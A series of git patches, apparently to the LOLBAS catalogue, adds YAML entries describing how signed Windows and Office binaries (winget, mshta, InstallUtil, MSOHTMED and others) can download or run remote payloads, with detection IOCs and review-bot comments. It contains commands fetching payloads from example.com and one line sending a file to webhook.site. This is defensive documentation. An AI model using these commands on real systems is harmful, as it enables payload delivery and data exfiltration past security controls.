From 83ca9aa1974bc545b4a4a8a75dd6ebd12a02b8a4 Mon Sep 17 00:00:00 2001 From: saulpanders <34975519+saulpanders@users.noreply.github.com> Date: Tue, 4 Oct 2022 06:27:47 -0400 Subject: [PATCH 1/4] Adding Windows Package Manager tool winget.exe (#188) Co-authored-by: Wietze --- yml/OSBinaries/Winget.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/Winget.yml diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml new file mode 100644 index 0000000..4e9d4e5 --- /dev/null +++ b/yml/OSBinaries/Winget.yml @@ -0,0 +1,28 @@ +--- +Name: winget.exe +Description: Windows Package Manager tool +Author: Paul Sanders +Created: 2022-01-03 +Commands: + - Command: winget.exe install --manifest manifest.yml + Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' + Usecase: Download and execute an arbitrary file from the internet + Category: Execute + Privileges: Local Aministrator - required to enabled local manifest setting + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe +Code_Sample: + - Code: https://gist.github.com/saulpanders/00e1177602a8c01a3a8bfa932b3886b0 +Detection: + - IOC: winget.exe spawned with local manifest file + - IOC: Sysmon Event ID 1 - Process Creation + - Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html + - Sigma: https://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml +Resources: + - Link: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html + - Link: https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended +Acknowledgement: + - Person: Paul + Handle: '@saulpanders' 
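Review bot: The `Privileges` line in the new Winget.yml hunk carries two typos that will be rendered on the site as-is: `Local Aministrator - required to enabled local manifest setting` should read `Local Administrator - required to enable local manifest setting`. Two smaller points on the same hunk: the `Full_Path` entry `C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe` bakes a profile name into the path, so anyone copying it into a hunt query will miss every other user; `%LOCALAPPDATA%\Microsoft\WindowsApps\winget.exe` (or a note that `user` is a placeholder) would be safer. And the second IOC, `Sysmon Event ID 1 - Process Creation`, adds nothing the first IOC (`winget.exe spawned with local manifest file`) does not already say; either fold the distinguishing argument into it (`Sysmon Event ID 1 - winget.exe with --manifest on the command line`) or drop it.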
From 143a6639f82607627fdf9c66827a70221baa66ca Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Tue, 4 Oct 2022 06:50:59 -0400 Subject: [PATCH 2/4] Adding .gitattributes file, fixing template/checks (#253) --- .gitattributes | 1 + .github/workflows/yaml-linting.yml | 5 +++++ YML-Template.yml | 18 ++++++++---------- 3 files changed, 14 insertions(+), 10 deletions(-) create mode 100644 .gitattributes diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..c68529d --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.yml text eol=lf diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 70d7678..120daa8 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -13,6 +13,11 @@ jobs: no_warnings: true file_or_dir: yml/**/*.yml config_file: .github/.yamllint + - name: Validate Template Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: YML-Template.yml + schema: YML-Schema.yml - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: diff --git a/YML-Template.yml b/YML-Template.yml index a9ff5b3..bae43db 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -4,12 +4,10 @@ Description: Something general about the binary Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality, - Alias: Binary64.exe # but for example, is built for different architecture. Author: The name of the person that created this file -Created: YYYY-MM-DD (date the person created this file) +Created: 1970-01-01 # YYYY-MM-DD (date the person created this file) Commands: - Command: The command Description: Description of the command - Aliases: - - An alias for the command (example: ProcDump.exe & ProcDump64.exe) Usecase: A description of the usecase Category: Execute Privileges: Required privs 
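Review bot: The first YML-Template.yml hunk removes the per-command `Aliases` list (`- Aliases:` / `- An alias for the command (example: ProcDump.exe & ProcDump64.exe)`) but YML-Schema.yml is not part of this patch, so it is not visible whether the schema never allowed a command-level `Aliases` (template was wrong) or still allows it (template now under-documents a valid field); a sentence in the commit message saying which would save the next contributor from guessing. The new `Validate Template Schema` workflow step that runs pykwalify over YML-Template.yml will catch the former case but not the latter. On `.gitattributes`: `*.yml text eol=lf` only normalises line endings when files are next added, so any `.yml` files already committed with CRLF stay that way until a one-off `git add --renormalize .`; worth doing in the same change so the lint step behaves the same on every checkout.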
@@ -26,19 +24,19 @@ Full_Path: - Path: c:\windows\system32\bin.exe - Path: c:\windows\syswow64\bin.exe Code_Sample: - - Code: http://url.com/git.txt + - Code: http://example.com/git.txt Detection: - IOC: Event ID 10 - IOC: binary.exe spawned - - Analysis: https://link/to/blog/gist/writeup/if/applicable - - Sigma: https://link/to/sigma/rule/if/applicable - - Elastic: https://link/to/elastic/rule/if/applicable - - Splunk: https://link/to/splunk/rule/if/applicable - - BlockRule: https://link/to/microsoft/block/rules/if/applicable + - Analysis: https://example.com/to/blog/gist/writeup/if/applicable + - Sigma: https://example.com/to/sigma/rule/if/applicable + - Elastic: https://example.com/to/elastic/rule/if/applicable + - Splunk: https://example.com/to/splunk/rule/if/applicable + - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable Resources: - Link: http://blogpost.com - Link: http://twitter.com/something - - Link: Threatintelreport... + - Link: http://example.com/Threatintelreport Acknowledgement: - Person: John Doe Handle: '@johndoe' From ea68ad824d0cbe2471e8a0f08b40cb32d3acad02 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:13:56 +0700 Subject: [PATCH 3/4] Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze --- yml/OtherMSBinaries/MsoHtmEd.yml | 34 +++++++++++++++++++++++++ yml/OtherMSBinaries/Mspub.yml | 31 ++++++++++++++++++++++ yml/OtherMSBinaries/ProtocolHandler.yml | 27 ++++++++++++++++++++ 3 files changed, 92 insertions(+) create mode 100644 yml/OtherMSBinaries/MsoHtmEd.yml create mode 100644 yml/OtherMSBinaries/Mspub.yml create mode 100644 yml/OtherMSBinaries/ProtocolHandler.yml diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml new file mode 100644 index 0000000..d9c42af --- /dev/null +++ b/yml/OtherMSBinaries/MsoHtmEd.yml 
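Review bot: The second YML-Template.yml hunk moves the `Code_Sample` and `Detection` placeholders to example.com but leaves two `Resources` placeholders on real, registrable domains (`http://blogpost.com`, `http://twitter.com/something`); for consistency with the rest of the hunk make them `https://example.com/blogpost` and `https://example.com/something` too. The added `- Link: http://example.com/Threatintelreport` line is fine and fixes the previously malformed `Threatintelreport...` value.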
@@ -0,0 +1,34 @@ +--- +Name: MsoHtmEd.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-07-24 +Commands: + - Command: MsoHtmEd.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml new file mode 100644 index 0000000..8ebc14f --- /dev/null +++ b/yml/OtherMSBinaries/Mspub.yml 
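Review bot: The last two `Full_Path` entries in the MsoHtmEd.yml hunk are identical (`C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe` is listed twice); drop the duplicate. The `Description` and `Usecase` fields in this hunk (`Description: Downloads payload from remote server`, `Usecase: It will download a remote payload and place it in the cache folder ...`) are the opposite way round from the same two strings in the entries added to ConfigSecurityPolicy.yml, Installutil.yml, Mshta.yml and Presentationhost.yml in the next patch of this series; pick one ordering for all seven entries. Finally, the single IOC `Suspicious Office application internet/network traffic` is hard to act on; since the `Usecase` already names the drop location, an indicator such as MSOHTMED.exe making an outbound connection (Sysmon Event ID 3) or writing under `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE` would give a detection engineer something concrete.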
@@ -0,0 +1,31 @@ +--- +Name: Mspub.exe +Description: Microsoft Publisher +Author: Nir Chako +Created: 2022-08-02 +Commands: + - Command: mspub.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/ProtocolHandler.yml b/yml/OtherMSBinaries/ProtocolHandler.yml new file mode 100644 index 0000000..ab2b2ab --- /dev/null +++ b/yml/OtherMSBinaries/ProtocolHandler.yml 
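Review bot: `Person: 'Nir Chako (Pentera)'` is quoted in the Mspub.yml hunk but unquoted in the MsoHtmEd.yml and ProtocolHandler.yml hunks of the same patch, and the following patch is removing exactly this kind of unnecessary quoting (`-Author: 'Oddvar Moe'` / `+Author: Oddvar Moe`); drop the quotes here as well. The workflow runs yamllint with `no_warnings: true`, so nothing automated will catch the inconsistency.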
@@ -0,0 +1,27 @@ +--- +Name: ProtocolHandler.exe +Description: Microsoft Office binary +Author: Nir Chako +Created: 2022-07-24 +Commands: + - Command: ProtocolHandler.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe +Detection: + - IOC: Suspicious Office application Internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' From f29471dde9cd18e59d5851165a2272a3f97c8ab5 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:27:31 +0700 Subject: [PATCH 4/4] Adding download functionality entries to existing binaries (#239) Co-authored-by: Wietze --- yml/OSBinaries/ConfigSecurityPolicy.yml | 12 +++++++++++- yml/OSBinaries/Installutil.yml | 13 ++++++++++--- yml/OSBinaries/Mshta.yml | 11 ++++++++++- yml/OSBinaries/Presentationhost.yml | 13 ++++++++++--- 4 files changed, 41 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index a433c69..5c708ff 100644 
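Review bot: `Description: Microsoft Office binary` in the ProtocolHandler.yml hunk says nothing the filename does not already; the sibling entries at least identify the component (`Microsoft Office component`, `Microsoft Publisher`), and a reader deciding whether ProtocolHandler.exe touching the network is baseline behaviour needs one line on what Office uses it for. Two consistency nits against the other two hunks in this patch: the IOC here reads `Internet/network traffic` where the others use `internet/network traffic`, and the `Full_Path` list stops at Office15 while MsoHtmEd.yml and Mspub.yml go back to Office14/Office12; if the binary does not ship with older Office releases, fine, but it is worth a word in the commit message.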
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -1,7 +1,7 @@ --- Name: ConfigSecurityPolicy.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. -Author: 'Ialle Teixeira' +Author: Ialle Teixeira Created: 2020-09-04 Commands: - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile @@ -11,7 +11,15 @@ Commands: Privileges: User MitreID: T1567 OperatingSystem: Windows 10 + - Command: ConfigSecurityPolicy.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: + - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe Code_Sample: - Code: @@ -29,3 +37,5 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index b257c39..2b35e14 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -1,7 +1,7 @@ --- Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll 
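Review bot: The ConfigSecurityPolicy.yml hunk leaves the empty `Code_Sample:` / `- Code:` block in place (visible in the context lines), while the Installutil.yml and Presentationhost.yml hunks in the same patch delete theirs; with pykwalify validating OSBinaries against YML-Schema.yml an empty `Code:` value is either acceptable everywhere or nowhere, so remove it here too for a consistent tree. The new `Full_Path` entry `C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe` is a good addition next to the versioned `...\Platform\4.18.2008.9-0\...` path, whose version segment goes stale with every Defender platform update.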
@@ -18,13 +18,18 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: InstallUtil.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml @@ -39,3 +44,5 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 43717d7..1a6dd6e 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -1,7 +1,7 @@ --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: mshta.exe evilfile.hta 
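Review bot: The new `InstallUtil.exe https://example.com/payload` command in the Installutil.yml hunk arrives with no change to `Detection`; the existing links are named for execution and AppLocker bypass (`win_possible_applocker_bypass.yml`) and for beaconing (`defense_evasion_installutil_beacon.toml`). If the Elastic rule already fires on InstallUtil.exe making an outbound connection, say so in an `- IOC:` line; if not, add one for InstallUtil.exe with an `http(s)://` argument on the command line and a Sysmon Event ID 3 network connection from it. Minor: the new `OperatingSystem` line copies the lowercase `Windows vista` from the line above; `Windows Vista` while you are here.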
@@ -32,6 +32,13 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) + - Command: mshta.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe @@ -69,3 +76,5 @@ Acknowledgement: Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 957ae44..7ba0ef5 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -1,7 +1,7 @@ --- Name: Presentationhost.exe Description: File is used for executing Browser applications -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap 
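Review bot: In the Mshta.yml hunk the new download command lists `Windows 10, Windows 11` directly after a context line whose mshta command is marked `(Does not work on 1903 and newer)`; a reader will immediately ask whether the URL-argument download was verified on a current build. Adding the tested build to the `Description`, or a short `- IOC:` for mshta.exe launched with a URL argument and an outbound connection (Sysmon Event ID 3), would answer that and give the entry its own detection hook, since the existing detection links pre-date this technique. Same `Windows vista` capitalisation nit as in the Installutil.yml hunk.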
@@ -11,11 +11,16 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: Presentationhost.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml - IOC: Execution of .xbap files may not be common on production workstations @@ -25,3 +30,5 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0'
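Review bot: The only IOC left in the Presentationhost.yml hunk's context, `Execution of .xbap files may not be common on production workstations`, does not cover the new `Presentationhost.exe https://example.com/payload` command, and the linked Sigma rule name (`win_susp_presentationhost_execution.yml`) suggests it keys on execution rather than network activity; add an `- IOC:` for Presentationhost.exe started with an `http(s)://` argument or making an outbound connection (Sysmon Event ID 3). Deleting the empty `Code_Sample:` / `- Code:` block here matches the Installutil.yml hunk but not the ConfigSecurityPolicy.yml hunk in the same patch, which keeps it; make the three consistent.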